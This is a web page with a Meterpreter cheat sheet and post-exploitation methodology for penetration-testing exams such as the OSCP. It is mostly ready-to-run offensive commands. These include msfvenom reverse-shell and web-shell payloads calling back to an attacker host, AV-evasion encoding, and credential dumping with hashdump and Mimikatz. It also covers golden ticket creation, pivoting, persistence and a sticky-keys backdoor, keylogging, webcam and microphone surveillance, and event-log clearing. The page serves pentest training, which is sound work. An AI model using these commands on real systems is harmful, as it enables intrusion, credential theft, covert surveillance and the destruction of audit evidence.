Skip to Content

Site is under construction if theres any issues, please contact me at

Meterpreter

Cheatsheet

# --- Payload Generation (msfvenom) ---
 
# Windows reverse shell (staged)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe
 
# Windows reverse shell (stageless)
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe
 
# Linux reverse shell (staged)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f elf -o shell.elf
 
# Linux reverse shell (stageless)
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f elf -o shell.elf
 
# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f raw -o shell.php
 
# ASP web shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f asp -o shell.asp
 
# WAR (Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f war -o shell.war
 
# DLL (for DLL hijacking / injection)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f dll -o shell.dll
 
# --- Listener Setup (msfconsole) ---
 
# Start multi/handler listener
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST <LHOST>; set LPORT <LPORT>; run"
 
# --- Post-Exploitation (inside Meterpreter session) ---
 
# System info
sysinfo
 
# Current user
getuid
 
# Elevate to SYSTEM
getsystem
 
# Dump SAM hashes (requires SYSTEM)
hashdump
 
# Dump hashes with Mimikatz
load kiwi
creds_all
 
# Migrate to a stable process (e.g., explorer.exe)
ps
migrate <PID>
 
# Search for files
search -f *.txt -d C:\\Users
 
# Download a file
download C:\\Users\\<USER>\\Desktop\\flag.txt
 
# Upload a file
upload /tmp/linpeas.sh /tmp/
 
# Drop to system shell
shell
 
# Background session (return to msf)
background
 
# Port forwarding (local)
portfwd add -l <LOCAL_PORT> -p <REMOTE_PORT> -r <TARGET_IP>
 
# Route traffic through session (pivoting)
run autoroute -s <SUBNET>/24
 
# Take screenshot
screenshot
 
# Start keylogger
keyscan_start
keyscan_dump
keyscan_stop
 
# Clear event logs (Windows)
clearev

Methodology

[!IMPORTANT] Follow this checklist after landing a Meterpreter session. The goal is to stabilize, escalate, loot, and pivot.

Phase 1: Stabilize the Session

  • sysinfo — Confirm OS, architecture, hostname, domain
  • getuid — Check current user context
  • ps — List processes, find a stable long-lived process (e.g., explorer.exe, svchost.exe)
  • migrate <PID> — Migrate into a stable process to avoid losing the session if the exploit process dies
  • getpid — Confirm migration succeeded

[!CAUTION] OPSEC Warning: Migrating to a process owned by a different user may fail or kill your session. Always migrate to a process owned by the same user.

Phase 2: Escalate Privileges

  • getsystem — Try automated SYSTEM escalation (uses named pipe impersonation / token duplication)
  • If getsystem fails, background the session and run: use post/multi/recon/local_exploit_suggesterset SESSION <ID>run
  • Check for token impersonation: use incognitolist_tokens -uimpersonate_token "<DOMAIN>\\<USER>"
  • Check UAC status: run post/windows/gather/win_privs — if UAC is blocking, try exploit/windows/local/bypassuac_* modules
  • On Linux: shell → run manual [[Linux-Privilege-Escalation]] methodology

Phase 3: Credential Harvesting

  • hashdump — Dump SAM hashes (requires SYSTEM on Windows)
  • load kiwicreds_all — Mimikatz integration, dumps all cached credentials
  • kiwilsa_dump_sam — SAM database dump via LSA
  • kiwilsa_dump_secrets — LSA secrets (may contain service account passwords)
  • run post/windows/gather/credentials/credential_collector — Aggregate all found creds
  • run post/multi/gather/ssh_creds — Grab SSH keys on Linux
  • search -f *.config -d C:\\inetpub — Search for web.config with connection strings
  • search -f *.txt -d C:\\Users — Search for password files, notes
  • cat C:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt — PowerShell history

Phase 4: Loot the System

  • download C:\\Users\\<USER>\\Desktop\\* — Grab desktop files / flags
  • search -f proof.txt / search -f flag.txt — Find exam flags
  • run post/windows/gather/enum_applications — Installed software (may reveal vulns)
  • run post/windows/gather/enum_logged_on_users — Who else has logged in
  • run post/windows/gather/checkvm — Detect if target is a VM
  • arp — View ARP cache for network discovery
  • netstat — Active connections (reveals internal services/hosts)
  • ifconfig — Network interfaces (look for dual-homed hosts)
  • route — Routing table (reveals additional subnets)

Phase 5: Pivot to Internal Network

  • run autoroute -s <SUBNET>/24 — Add route through the compromised host
  • run autoroute -p — Verify routes
  • portfwd add -l <LOCAL_PORT> -p <REMOTE_PORT> -r <INTERNAL_IP> — Forward local port to internal target
  • Use auxiliary/scanner/portscan/tcp through the session to scan internal hosts
  • Background session and use exploit/multi/handler for chained sessions through the pivot

Phase 6: Persistence (if in scope)

  • run persistence -U -i 10 -p <LPORT> -r <LHOST> — User-level persistence (auto-starts on login)
  • run post/windows/manage/enable_rdp — Enable RDP for persistent GUI access
  • run post/windows/manage/sticky_keys — Sticky keys backdoor (RDP without creds)

[!CAUTION] OPSEC Warning: Persistence mechanisms leave artifacts. Only use if explicitly in scope. clearev alone does not remove all traces.

Phase 7: Clean Up

  • clearev — Clear Windows event logs (Security, System, Application)
  • Remove uploaded files
  • Kill any spawned processes
  • screenshot — Take final screenshots for the report before exiting

Payload Generation Reference

Common msfvenom Formats

PlatformPayload (Staged)FormatExtension
Windows x64windows/x64/meterpreter/reverse_tcpexe.exe
Windows x86windows/meterpreter/reverse_tcpexe.exe
Linux x64linux/x64/meterpreter/reverse_tcpelf.elf
PHPphp/meterpreter/reverse_tcpraw.php
ASPwindows/meterpreter/reverse_tcpasp.asp
ASPXwindows/meterpreter/reverse_tcpaspx.aspx
JSP/WARjava/jsp_shell_reverse_tcpwar.war
Pythonpython/meterpreter/reverse_tcpraw.py
DLLwindows/x64/meterpreter/reverse_tcpdll.dll

[!TIP] Staged vs Stageless: Staged payloads (/reverse_tcp) are smaller but need the handler to send stage 2. Stageless (_reverse_tcp) are larger but self-contained — use stageless if the network is unreliable or the handler might restart.

Encoding / AV Evasion

# Shikata ga nai encoder (basic, often detected now)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -e x64/xor_dynamic -i 5 -f exe -o shell.exe
 
# List all encoders
msfvenom --list encoders
 
# List all formats
msfvenom --list formats

[!NOTE] Basic msfvenom encoding is widely detected by modern AV/EDR. For real engagements, consider custom loaders, shellcode injection, or tools like Sliver/Havoc as alternatives to Metasploit.

Core Commands

CommandPurpose
backgroundBackground session, return to msf> prompt
sessionsList all sessions / switch: sessions -i <ID>
exitKill the Meterpreter session
helpShow all available commands
info <module>Show info about a post module
run <module>Execute a post module or script
irbOpen interactive Ruby shell
load <extension>Load extension (e.g., kiwi, incognito, powershell)
migrate <PID>Move Meterpreter into another process
guidShow session GUID

File System Commands

CommandPurpose
cd <dir>Change directory
ls / dirList files
pwdPrint working directory
cat <file>Display file contents
edit <file>Edit a file in-place
rm <file>Delete a file
mkdir <dir>Create a directory
rmdir <dir>Remove a directory
upload <src> <dst>Upload file to target
download <src> <dst>Download file from target
search -f <pattern>Search for files: search -f *.txt -d C:\\Users
checksum md5 <file>MD5 hash a file

Networking Commands

CommandPurpose
arpDisplay ARP cache (discover hosts on local subnet)
ifconfig / ipconfigShow network interfaces
netstatShow active connections
routeDisplay/modify routing table
portfwd add -l <LPORT> -p <RPORT> -r <IP>Forward local port to remote service
portfwd delete -l <LPORT>Remove port forward
portfwd listList active port forwards
resolve <hostname>DNS resolution on target

System Commands

CommandPurpose
sysinfoOS, hostname, arch, domain, language
getuidCurrent user
getpidCurrent process ID
psList processes
kill <PID>Kill a process
pkill <name>Kill process by name
execute -f <cmd>Run a command: execute -f cmd.exe -i -H
shellDrop to native OS shell
rebootReboot target
shutdownShutdown target
clearevClear Windows event logs
getsystemAttempt SYSTEM privilege escalation

Surveillance Commands

CommandPurpose
screenshotCapture desktop screenshot
screenshareWatch desktop in real time
keyscan_startStart keylogger
keyscan_dumpDump captured keystrokes
keyscan_stopStop keylogger
record_mic <seconds>Record microphone audio
webcam_listList webcams
webcam_snapTake a webcam photo
webcam_streamStream webcam video
idletimeSeconds since user last interacted

[!CAUTION] OPSEC Warning: Surveillance commands (keylogger, webcam, screenshare) are almost certainly out of scope on exams. Only use if the Rules of Engagement explicitly permit it.

Useful Post Modules

ModulePurpose
post/multi/recon/local_exploit_suggesterSuggest local privilege escalation exploits
post/windows/gather/hashdumpDump SAM hashes
post/windows/gather/credentials/credential_collectorAggregate all found credentials
post/windows/gather/enum_applicationsList installed applications
post/windows/gather/enum_logged_on_usersList logged on / recently logged on users
post/windows/gather/checkvmDetect virtualization
post/windows/gather/win_privsShow current privileges and UAC status
post/windows/manage/enable_rdpEnable RDP on target
post/windows/manage/migrateMigrate to another process
post/multi/manage/autorouteAdd pivot routes through session
post/multi/gather/ssh_credsCollect SSH keys from target
post/linux/gather/hashdumpDump /etc/shadow on Linux
post/linux/gather/enum_configsGather Linux config files

[!TIP] Pentest Tip: Always run local_exploit_suggester after landing a session. It cross-references the target OS/patch level against known local exploits and saves significant manual enumeration time.

Kiwi (Mimikatz) Extension

# Load kiwi
load kiwi
 
# Dump all credentials
creds_all
 
# Dump SAM database
lsa_dump_sam
 
# Dump LSA secrets
lsa_dump_secrets
 
# Dump Kerberos tickets
kerberos_ticket_list
 
# Golden ticket
golden_ticket_create -d <DOMAIN> -u Administrator -s <DOMAIN_SID> -k <KRBTGT_HASH> -t /tmp/golden.kirbi

[!IMPORTANT] Kiwi commands require SYSTEM privileges. Run getsystem first or migrate to a SYSTEM-owned process.

#cpts #oscp #exploitation #post-exploitation #tools #windows #linux

Last updated on
Page